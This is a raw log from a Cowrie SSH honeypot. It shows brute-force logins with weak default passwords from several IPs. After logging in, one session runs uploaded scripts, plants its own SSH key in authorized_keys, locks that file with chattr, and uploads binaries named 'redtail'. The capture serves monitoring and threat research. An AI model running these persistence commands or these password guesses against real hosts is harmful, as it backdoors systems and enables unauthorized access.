{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:06:01.043643Z","src_ip":"212.227.235.229","session":"9a3109f780ff"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:06:01.308500Z","src_ip":"196.251.86.249","session":"0550ec00cecc"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:06:01.309250Z","src_ip":"196.251.86.249","session":"0550ec00cecc"}
{"eventid":"cowrie.login.failed","username":"git","password":"1q2w3e4r","message":"login attempt [git/1q2w3e4r] failed","sensor":"my-vps","timestamp":"2025-08-26T12:06:02.598264Z","src_ip":"196.251.86.249","session":"0550ec00cecc"}
{"eventid":"cowrie.login.failed","username":"admin","password":"12345678","message":"login attempt [admin/12345678] failed","sensor":"my-vps","timestamp":"2025-08-26T12:06:02.779824Z","src_ip":"212.227.235.229","session":"9a3109f780ff"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:06:03.930312Z","src_ip":"212.227.235.229","session":"9a3109f780ff"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:06:04.113391Z","src_ip":"196.251.86.249","session":"0550ec00cecc"}
{"eventid":"cowrie.client.kex","hassh":"19532158b559096b89b1a5f7d17175b2","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,arcfour128,arcfour,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","arcfour128","arcfour","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 19532158b559096b89b1a5f7d17175b2","sensor":"my-vps","timestamp":"2025-08-26T12:06:04.220416Z","src_ip":"118.191.0.204","session":"9c9f70ddcd37"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":43376,"dst_ip":"1.2.3.4","dst_port":22,"session":"f06f9ed307fa","protocol":"ssh","message":"New connection: 83.168.105.65:43376 (1.2.3.4:22) [session: f06f9ed307fa]","sensor":"my-vps","timestamp":"2025-08-26T12:06:04.662386Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:06:04.663245Z","src_ip":"83.168.105.65","session":"f06f9ed307fa"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:06:04.699823Z","src_ip":"83.168.105.65","session":"f06f9ed307fa"}
{"eventid":"cowrie.login.success","username":"root","password":"123","message":"login attempt [root/123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:06:04.810050Z","src_ip":"83.168.105.65","session":"f06f9ed307fa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:06:04.907358Z","src_ip":"83.168.105.65","session":"f06f9ed307fa"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T12:06:04.908371Z","src_ip":"83.168.105.65","session":"f06f9ed307fa"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:06:04.946261Z","src_ip":"83.168.105.65","session":"f06f9ed307fa"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:06:04.947434Z","src_ip":"83.168.105.65","session":"f06f9ed307fa"}
{"eventid":"cowrie.login.success","username":"root","password":"ZXCVB","message":"login attempt [root/ZXCVB] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:06:05.733918Z","src_ip":"118.191.0.204","session":"9c9f70ddcd37"}
{"eventid":"cowrie.session.closed","duration":"41.7","message":"Connection lost after 41.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:06:05.932167Z","src_ip":"118.191.0.204","session":"9c9f70ddcd37"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.143.51","src_port":39136,"dst_ip":"1.2.3.4","dst_port":22,"session":"173e9d8cb90d","protocol":"ssh","message":"New connection: 213.209.143.51:39136 (1.2.3.4:22) [session: 173e9d8cb90d]","sensor":"my-vps","timestamp":"2025-08-26T12:06:20.278751Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:06:20.280500Z","src_ip":"213.209.143.51","session":"173e9d8cb90d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:06:20.301878Z","src_ip":"213.209.143.51","session":"173e9d8cb90d"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":52196,"dst_ip":"1.2.3.4","dst_port":22,"session":"0d51eb6a18e7","protocol":"ssh","message":"New connection: 83.168.105.65:52196 (1.2.3.4:22) [session: 0d51eb6a18e7]","sensor":"my-vps","timestamp":"2025-08-26T12:06:20.311215Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:06:20.312031Z","src_ip":"83.168.105.65","session":"0d51eb6a18e7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:06:20.348997Z","src_ip":"83.168.105.65","session":"0d51eb6a18e7"}
{"eventid":"cowrie.login.success","username":"root","password":"ZXCVB","message":"login attempt [root/ZXCVB] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:06:20.365972Z","src_ip":"213.209.143.51","session":"173e9d8cb90d"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123456","message":"login attempt [postgres/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T12:06:20.523010Z","src_ip":"83.168.105.65","session":"0d51eb6a18e7"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:06:21.561174Z","src_ip":"83.168.105.65","session":"0d51eb6a18e7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:06:24.884876Z","src_ip":"213.209.143.51","session":"173e9d8cb90d"}
{"eventid":"cowrie.command.input","input":"chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a; echo -e \"\\x61\\x75\\x74\\x68\\x5F\\x6F\\x6B\\x0A\"","message":"CMD: chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a; echo -e \"\\x61\\x75\\x74\\x68\\x5F\\x6F\\x6B\\x0A\"","sensor":"my-vps","timestamp":"2025-08-26T12:06:24.885524Z","src_ip":"213.209.143.51","session":"173e9d8cb90d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4a869e4a816476f12d5cd6aab0625c5f6aab97714a486f6b8a5f484cbc8981f6","size":80,"shasum":"4a869e4a816476f12d5cd6aab0625c5f6aab97714a486f6b8a5f484cbc8981f6","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/4a869e4a816476f12d5cd6aab0625c5f6aab97714a486f6b8a5f484cbc8981f6 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:06:24.906918Z","src_ip":"213.209.143.51","session":"173e9d8cb90d"}
{"eventid":"cowrie.session.file_upload","filename":"clean.sh","outfile":"var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","shasum":"d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","message":"SFTP Uploaded file \"clean.sh\" to var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","sensor":"my-vps","timestamp":"2025-08-26T12:06:24.927229Z","src_ip":"213.209.143.51","session":"173e9d8cb90d"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.arm7","outfile":"var/lib/cowrie/downloads/229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","shasum":"229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","message":"SFTP Uploaded file \"redtail.arm7\" to var/lib/cowrie/downloads/229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","sensor":"my-vps","timestamp":"2025-08-26T12:06:24.929597Z","src_ip":"213.209.143.51","session":"173e9d8cb90d"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.arm8","outfile":"var/lib/cowrie/downloads/89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","shasum":"89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","message":"SFTP Uploaded file \"redtail.arm8\" to var/lib/cowrie/downloads/89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","sensor":"my-vps","timestamp":"2025-08-26T12:06:24.931676Z","src_ip":"213.209.143.51","session":"173e9d8cb90d"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.i686","outfile":"var/lib/cowrie/downloads/ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","shasum":"ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","message":"SFTP Uploaded file \"redtail.i686\" to var/lib/cowrie/downloads/ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","sensor":"my-vps","timestamp":"2025-08-26T12:06:24.933967Z","src_ip":"213.209.143.51","session":"173e9d8cb90d"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.x86_64","outfile":"var/lib/cowrie/downloads/d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","shasum":"d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","message":"SFTP Uploaded file \"redtail.x86_64\" to var/lib/cowrie/downloads/d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","sensor":"my-vps","timestamp":"2025-08-26T12:06:24.936432Z","src_ip":"213.209.143.51","session":"173e9d8cb90d"}
{"eventid":"cowrie.session.file_upload","filename":"setup.sh","outfile":"var/lib/cowrie/downloads/783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","shasum":"783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","message":"SFTP Uploaded file \"setup.sh\" to var/lib/cowrie/downloads/783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","sensor":"my-vps","timestamp":"2025-08-26T12:06:24.937433Z","src_ip":"213.209.143.51","session":"173e9d8cb90d"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:06:24.959091Z","src_ip":"213.209.143.51","session":"173e9d8cb90d"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":42154,"dst_ip":"1.2.3.4","dst_port":22,"session":"057db953f879","protocol":"ssh","message":"New connection: 83.168.105.65:42154 (1.2.3.4:22) [session: 057db953f879]","sensor":"my-vps","timestamp":"2025-08-26T12:06:35.814145Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:06:35.814842Z","src_ip":"83.168.105.65","session":"057db953f879"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:06:35.855688Z","src_ip":"83.168.105.65","session":"057db953f879"}
{"eventid":"cowrie.login.failed","username":"dev","password":"dev123456","message":"login attempt [dev/dev123456] failed","sensor":"my-vps","timestamp":"2025-08-26T12:06:35.978324Z","src_ip":"83.168.105.65","session":"057db953f879"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:06:37.020642Z","src_ip":"83.168.105.65","session":"057db953f879"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":37494,"dst_ip":"1.2.3.4","dst_port":22,"session":"9918bfb2ba54","protocol":"ssh","message":"New connection: 45.88.8.215:37494 (1.2.3.4:22) [session: 9918bfb2ba54]","sensor":"my-vps","timestamp":"2025-08-26T12:06:38.864203Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33910,"dst_ip":"1.2.3.4","dst_port":22,"session":"3ecab4d392c4","protocol":"ssh","message":"New connection: 212.227.235.229:33910 (1.2.3.4:22) [session: 3ecab4d392c4]","sensor":"my-vps","timestamp":"2025-08-26T12:06:39.004741Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:06:39.303323Z","src_ip":"45.88.8.215","session":"9918bfb2ba54"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.c